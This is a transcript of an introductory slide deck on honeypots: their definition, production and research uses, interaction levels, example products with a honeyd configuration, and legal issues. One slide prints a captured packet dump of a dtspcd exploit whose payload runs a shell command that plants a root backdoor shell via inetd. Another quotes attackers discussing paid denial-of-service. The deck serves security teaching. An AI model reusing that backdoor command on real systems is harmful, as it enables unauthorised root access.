honeypots. your speaker lance spitzner –senior security architect, sun microsystems –founder of...
TRANSCRIPT
![Page 1: Honeypots. Your Speaker Lance Spitzner –Senior Security Architect, Sun Microsystems –Founder of the Honeynet Project –Author of Honeypots: Tracking Hackers](https://reader030.vdocuments.site/reader030/viewer/2022032606/56649e8e5503460f94b91266/html5/thumbnails/1.jpg)
Honeypots
![Page 2: Honeypots. Your Speaker Lance Spitzner –Senior Security Architect, Sun Microsystems –Founder of the Honeynet Project –Author of Honeypots: Tracking Hackers](https://reader030.vdocuments.site/reader030/viewer/2022032606/56649e8e5503460f94b91266/html5/thumbnails/2.jpg)
Your Speaker
Lance Spitzner– Senior Security Architect, Sun Microsystems
– Founder of the Honeynet Project
– Author of Honeypots: Tracking Hackers
– Co-author of Know Your Enemy
– Moderator of <[email protected]> maillist
– Former ‘tread head’.
![Page 3: Honeypots. Your Speaker Lance Spitzner –Senior Security Architect, Sun Microsystems –Founder of the Honeynet Project –Author of Honeypots: Tracking Hackers](https://reader030.vdocuments.site/reader030/viewer/2022032606/56649e8e5503460f94b91266/html5/thumbnails/3.jpg)
Purpose
To introduce you to honeypots, what they are, how they work, their value.
![Page 4: Honeypots. Your Speaker Lance Spitzner –Senior Security Architect, Sun Microsystems –Founder of the Honeynet Project –Author of Honeypots: Tracking Hackers](https://reader030.vdocuments.site/reader030/viewer/2022032606/56649e8e5503460f94b91266/html5/thumbnails/4.jpg)
Problem
• Variety of misconceptions about honeypots, everyone has their own definition.
• This confusion has caused lack of understanding, and adoption.
![Page 5: Honeypots. Your Speaker Lance Spitzner –Senior Security Architect, Sun Microsystems –Founder of the Honeynet Project –Author of Honeypots: Tracking Hackers](https://reader030.vdocuments.site/reader030/viewer/2022032606/56649e8e5503460f94b91266/html5/thumbnails/5.jpg)
Honeypot Timeline
• 1990/1991 The Cuckoo’s Egg and Evening with Berferd• 1997 - Deception Toolkit• 1998 - CyberCop Sting• 1998 - NetFacade (and Snort)• 1998 - BackOfficer Friendly• 1999 - Formation of the Honeynet Project• 2001 - Worms captured• 2002 - dtspcd exploit capture
![Page 6: Honeypots. Your Speaker Lance Spitzner –Senior Security Architect, Sun Microsystems –Founder of the Honeynet Project –Author of Honeypots: Tracking Hackers](https://reader030.vdocuments.site/reader030/viewer/2022032606/56649e8e5503460f94b91266/html5/thumbnails/6.jpg)
Definition
Any security resource who’s value lies in being probed, attacked, or compromised
![Page 7: Honeypots. Your Speaker Lance Spitzner –Senior Security Architect, Sun Microsystems –Founder of the Honeynet Project –Author of Honeypots: Tracking Hackers](https://reader030.vdocuments.site/reader030/viewer/2022032606/56649e8e5503460f94b91266/html5/thumbnails/7.jpg)
How honeypots work
• Simple concept
• A resource that expects no data, so any traffic to or from it is most likely unauthorized activity
![Page 8: Honeypots. Your Speaker Lance Spitzner –Senior Security Architect, Sun Microsystems –Founder of the Honeynet Project –Author of Honeypots: Tracking Hackers](https://reader030.vdocuments.site/reader030/viewer/2022032606/56649e8e5503460f94b91266/html5/thumbnails/8.jpg)
Not limited to specific purpose
• Honeypots do not solve a specific problem, instead they are a tool that contribute to your overall security architecture.
• Their value, and the problems they help solve, depend on how build, deploy, and you use them.
![Page 9: Honeypots. Your Speaker Lance Spitzner –Senior Security Architect, Sun Microsystems –Founder of the Honeynet Project –Author of Honeypots: Tracking Hackers](https://reader030.vdocuments.site/reader030/viewer/2022032606/56649e8e5503460f94b91266/html5/thumbnails/9.jpg)
Types
• Production (Law Enforcment)
• Research (Counter-Intelligence)
Marty’s idea
![Page 10: Honeypots. Your Speaker Lance Spitzner –Senior Security Architect, Sun Microsystems –Founder of the Honeynet Project –Author of Honeypots: Tracking Hackers](https://reader030.vdocuments.site/reader030/viewer/2022032606/56649e8e5503460f94b91266/html5/thumbnails/10.jpg)
Value
• What is the value of honeypots?
• One of the greatest areas of confusion concerning honeypot technologies.
![Page 11: Honeypots. Your Speaker Lance Spitzner –Senior Security Architect, Sun Microsystems –Founder of the Honeynet Project –Author of Honeypots: Tracking Hackers](https://reader030.vdocuments.site/reader030/viewer/2022032606/56649e8e5503460f94b91266/html5/thumbnails/11.jpg)
Advantages
• Based on how honeypots conceptually work, they have several advantages.– Reduce False Positives and False Negatives– Data Value– Resources– Simplicity
![Page 12: Honeypots. Your Speaker Lance Spitzner –Senior Security Architect, Sun Microsystems –Founder of the Honeynet Project –Author of Honeypots: Tracking Hackers](https://reader030.vdocuments.site/reader030/viewer/2022032606/56649e8e5503460f94b91266/html5/thumbnails/12.jpg)
Disadvantages
• Based on the concept of honeypots, they also have disadvantages:– Narrow Field of View– Fingerprinting– Risk
![Page 13: Honeypots. Your Speaker Lance Spitzner –Senior Security Architect, Sun Microsystems –Founder of the Honeynet Project –Author of Honeypots: Tracking Hackers](https://reader030.vdocuments.site/reader030/viewer/2022032606/56649e8e5503460f94b91266/html5/thumbnails/13.jpg)
Production
• Prevention
• Detection
• Response
![Page 14: Honeypots. Your Speaker Lance Spitzner –Senior Security Architect, Sun Microsystems –Founder of the Honeynet Project –Author of Honeypots: Tracking Hackers](https://reader030.vdocuments.site/reader030/viewer/2022032606/56649e8e5503460f94b91266/html5/thumbnails/14.jpg)
Prevention
• Keeping the burglar out of your house.• Honeypots, in general are not effective
prevention mechanisms.• Deception, Deterence, Decoys, are
phsychological weapons. They do NOT work against automated attacks:– worms
– auto-rooters
– mass-rooters
![Page 15: Honeypots. Your Speaker Lance Spitzner –Senior Security Architect, Sun Microsystems –Founder of the Honeynet Project –Author of Honeypots: Tracking Hackers](https://reader030.vdocuments.site/reader030/viewer/2022032606/56649e8e5503460f94b91266/html5/thumbnails/15.jpg)
Detection
• Detecting the burglar when he breaks in.
• Honeypots excel at this capability, due to their advantages.
![Page 16: Honeypots. Your Speaker Lance Spitzner –Senior Security Architect, Sun Microsystems –Founder of the Honeynet Project –Author of Honeypots: Tracking Hackers](https://reader030.vdocuments.site/reader030/viewer/2022032606/56649e8e5503460f94b91266/html5/thumbnails/16.jpg)
Response
• Honeypots can be used to help respond to an incident.– Can easily be pulled offline (unlike production
systems.– Little to no data pollution.
![Page 17: Honeypots. Your Speaker Lance Spitzner –Senior Security Architect, Sun Microsystems –Founder of the Honeynet Project –Author of Honeypots: Tracking Hackers](https://reader030.vdocuments.site/reader030/viewer/2022032606/56649e8e5503460f94b91266/html5/thumbnails/17.jpg)
Research Honeypots
• Early Warning and Prediction
• Discover new Tools and Tactics
• Understand Motives, Behavior, and Organization
• Develop Analysis and Forensic Skills
![Page 18: Honeypots. Your Speaker Lance Spitzner –Senior Security Architect, Sun Microsystems –Founder of the Honeynet Project –Author of Honeypots: Tracking Hackers](https://reader030.vdocuments.site/reader030/viewer/2022032606/56649e8e5503460f94b91266/html5/thumbnails/18.jpg)
Early Warning and Prediction
![Page 19: Honeypots. Your Speaker Lance Spitzner –Senior Security Architect, Sun Microsystems –Founder of the Honeynet Project –Author of Honeypots: Tracking Hackers](https://reader030.vdocuments.site/reader030/viewer/2022032606/56649e8e5503460f94b91266/html5/thumbnails/19.jpg)
Tools
01/08-08:46:04.378306 10.10.10.1:3592 -> 10.10.10.2:6112TCP TTL:48 TOS:0x0 ID:41388 IpLen:20 DgmLen:1500 DF***AP*** Seq: 0xFEE2C115 Ack: 0x5F66192F Win: 0x3EBC TcpLen: 32TCP Options (3) => NOP NOP TS: 463986683 4158792 30 30 30 30 30 30 30 32 30 34 31 30 33 65 30 30 0000000204103e0030 31 20 20 34 20 00 00 00 31 30 00 80 1C 40 11 01 4 [email protected] 1C 40 11 10 80 01 01 80 1C 40 11 80 1C 40 11 ..@.......@[email protected] 1C 40 11 80 1C 40 11 80 1C 40 11 80 1C 40 11 ..@...@...@[email protected] 23 FF E0 E2 23 FF E4 E4 23 FF E8 C0 23 FF EC .#...#...#...#..82 10 20 0B 91 D0 20 08 2F 62 69 6E 2F 6B 73 68 .. ... ./bin/ksh20 20 20 20 2D 63 20 20 65 63 68 6F 20 22 69 6E -c echo "in67 72 65 73 6C 6F 63 6B 20 73 74 72 65 61 6D 20 greslock stream 74 63 70 20 6E 6F 77 61 69 74 20 72 6F 6F 74 20 tcp nowait root 2F 62 69 6E 2F 73 68 20 73 68 20 2D 69 22 3E 2F /bin/sh sh -i">/74 6D 70 2F 78 3B 2F 75 73 72 2F 73 62 69 6E 2F tmp/x;/usr/sbin/69 6E 65 74 64 20 2D 73 20 2F 74 6D 70 2F 78 3B inetd -s /tmp/x;73 6C 65 65 70 20 31 30 3B 2F 62 69 6E 2F 72 6D sleep 10;/bin/rm20 2D 66 20 2F 74 6D 70 2F 78 20 41 41 41 41 41 -f /tmp/x AAAAA41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
![Page 20: Honeypots. Your Speaker Lance Spitzner –Senior Security Architect, Sun Microsystems –Founder of the Honeynet Project –Author of Honeypots: Tracking Hackers](https://reader030.vdocuments.site/reader030/viewer/2022032606/56649e8e5503460f94b91266/html5/thumbnails/20.jpg)
Tactics
![Page 21: Honeypots. Your Speaker Lance Spitzner –Senior Security Architect, Sun Microsystems –Founder of the Honeynet Project –Author of Honeypots: Tracking Hackers](https://reader030.vdocuments.site/reader030/viewer/2022032606/56649e8e5503460f94b91266/html5/thumbnails/21.jpg)
Motives and Behavior
J4ck: why don't you start charging for packet attacks?J4ck: "give me x amount and I'll take bla bla offline for this amount of time"J1LL: it was illegal last I checked.J4ck: heh, then everything you do is illegal. Why not make money off of it?J4ck: I know plenty of people that'd pay exorbatent amounts for packeting.
![Page 22: Honeypots. Your Speaker Lance Spitzner –Senior Security Architect, Sun Microsystems –Founder of the Honeynet Project –Author of Honeypots: Tracking Hackers](https://reader030.vdocuments.site/reader030/viewer/2022032606/56649e8e5503460f94b91266/html5/thumbnails/22.jpg)
Level of Interaction
• Level of Interaction determines amount of functionality a honeypot provides.
• The greater the interaction, the more you can learn.
• The greater the interaction, the more complexity and risk.
![Page 23: Honeypots. Your Speaker Lance Spitzner –Senior Security Architect, Sun Microsystems –Founder of the Honeynet Project –Author of Honeypots: Tracking Hackers](https://reader030.vdocuments.site/reader030/viewer/2022032606/56649e8e5503460f94b91266/html5/thumbnails/23.jpg)
Risk
• Chance that an attacker can use your honeypot to harm, attack, or infiltrate other systems or organizations.
![Page 24: Honeypots. Your Speaker Lance Spitzner –Senior Security Architect, Sun Microsystems –Founder of the Honeynet Project –Author of Honeypots: Tracking Hackers](https://reader030.vdocuments.site/reader030/viewer/2022032606/56649e8e5503460f94b91266/html5/thumbnails/24.jpg)
Low Interaction
• Provide Emulated Services
• No operating system for attacker to access.
• Information limited to transactional information and attackers activities with emulated services.
![Page 25: Honeypots. Your Speaker Lance Spitzner –Senior Security Architect, Sun Microsystems –Founder of the Honeynet Project –Author of Honeypots: Tracking Hackers](https://reader030.vdocuments.site/reader030/viewer/2022032606/56649e8e5503460f94b91266/html5/thumbnails/25.jpg)
High Interaction
• Provide Actual Operating Systems
• Learn extensive amounts of information.
• Extensive risk.
![Page 26: Honeypots. Your Speaker Lance Spitzner –Senior Security Architect, Sun Microsystems –Founder of the Honeynet Project –Author of Honeypots: Tracking Hackers](https://reader030.vdocuments.site/reader030/viewer/2022032606/56649e8e5503460f94b91266/html5/thumbnails/26.jpg)
Honeypots
• BackOfficer Friendly– http://www.nfr.com/products/bof/
• SPECTER– http://www.specter.com
• Honeyd– http://www.citi.umich.edu/u/provos/honeyd/
• ManTrap– http://www.recourse.com
• Honeynets– http://project.honeynet.org/papers/honeynet/
Low Interaction
High Interaction
![Page 27: Honeypots. Your Speaker Lance Spitzner –Senior Security Architect, Sun Microsystems –Founder of the Honeynet Project –Author of Honeypots: Tracking Hackers](https://reader030.vdocuments.site/reader030/viewer/2022032606/56649e8e5503460f94b91266/html5/thumbnails/27.jpg)
BackOfficer Friendly
![Page 28: Honeypots. Your Speaker Lance Spitzner –Senior Security Architect, Sun Microsystems –Founder of the Honeynet Project –Author of Honeypots: Tracking Hackers](https://reader030.vdocuments.site/reader030/viewer/2022032606/56649e8e5503460f94b91266/html5/thumbnails/28.jpg)
Specter
![Page 29: Honeypots. Your Speaker Lance Spitzner –Senior Security Architect, Sun Microsystems –Founder of the Honeynet Project –Author of Honeypots: Tracking Hackers](https://reader030.vdocuments.site/reader030/viewer/2022032606/56649e8e5503460f94b91266/html5/thumbnails/29.jpg)
Honeyd
create default set default personality "FreeBSD 2.2.1-STABLE" set default default action open add default tcp port 80 "sh /usr/local/honeyd/scripts/web.sh" add default tcp port 22 "sh /usr/local/honeyd/scripts/test.sh" add default tcp port 113 reset add default tcp port 1 reset create windowsset windows personality "Windows NT 4.0 Server SP5-SP6" set windows default action reset add windows tcp port 80 "sh /usr/local/honeyd/scripts/web.sh" add windows tcp port 25 block add windows tcp port 23 proxy real-server.tracking-hackers.com:23add windows tcp port 22 proxy $ipsrc:22set template uptime 3284460
bind 192.168.1.200 windows
![Page 30: Honeypots. Your Speaker Lance Spitzner –Senior Security Architect, Sun Microsystems –Founder of the Honeynet Project –Author of Honeypots: Tracking Hackers](https://reader030.vdocuments.site/reader030/viewer/2022032606/56649e8e5503460f94b91266/html5/thumbnails/30.jpg)
ManTrap
![Page 31: Honeypots. Your Speaker Lance Spitzner –Senior Security Architect, Sun Microsystems –Founder of the Honeynet Project –Author of Honeypots: Tracking Hackers](https://reader030.vdocuments.site/reader030/viewer/2022032606/56649e8e5503460f94b91266/html5/thumbnails/31.jpg)
Honeynets
![Page 32: Honeypots. Your Speaker Lance Spitzner –Senior Security Architect, Sun Microsystems –Founder of the Honeynet Project –Author of Honeypots: Tracking Hackers](https://reader030.vdocuments.site/reader030/viewer/2022032606/56649e8e5503460f94b91266/html5/thumbnails/32.jpg)
Which is best?
None, they all have their advantages and disadvantages. It depends on what you are attempting to achieve.
![Page 33: Honeypots. Your Speaker Lance Spitzner –Senior Security Architect, Sun Microsystems –Founder of the Honeynet Project –Author of Honeypots: Tracking Hackers](https://reader030.vdocuments.site/reader030/viewer/2022032606/56649e8e5503460f94b91266/html5/thumbnails/33.jpg)
Legal Issues
• Privacy
• Entrapment
• Liability
![Page 34: Honeypots. Your Speaker Lance Spitzner –Senior Security Architect, Sun Microsystems –Founder of the Honeynet Project –Author of Honeypots: Tracking Hackers](https://reader030.vdocuments.site/reader030/viewer/2022032606/56649e8e5503460f94b91266/html5/thumbnails/34.jpg)
Legal Contact for .mil / .gov
Department of Justice, Computer Crime and Intellectual Property Section– General Number: (202) 514-1026– Specific Contact: Richard Salgado
• Direct Telephone (202) 353-7848
• E-Mai: [email protected]
![Page 35: Honeypots. Your Speaker Lance Spitzner –Senior Security Architect, Sun Microsystems –Founder of the Honeynet Project –Author of Honeypots: Tracking Hackers](https://reader030.vdocuments.site/reader030/viewer/2022032606/56649e8e5503460f94b91266/html5/thumbnails/35.jpg)
Summary
Honeypos are a highly flexible security tool that can be used in a variety of different deployments.
![Page 36: Honeypots. Your Speaker Lance Spitzner –Senior Security Architect, Sun Microsystems –Founder of the Honeynet Project –Author of Honeypots: Tracking Hackers](https://reader030.vdocuments.site/reader030/viewer/2022032606/56649e8e5503460f94b91266/html5/thumbnails/36.jpg)
Resources
Honeypots: Tracking Hackershttp://www.tracking-hackers.com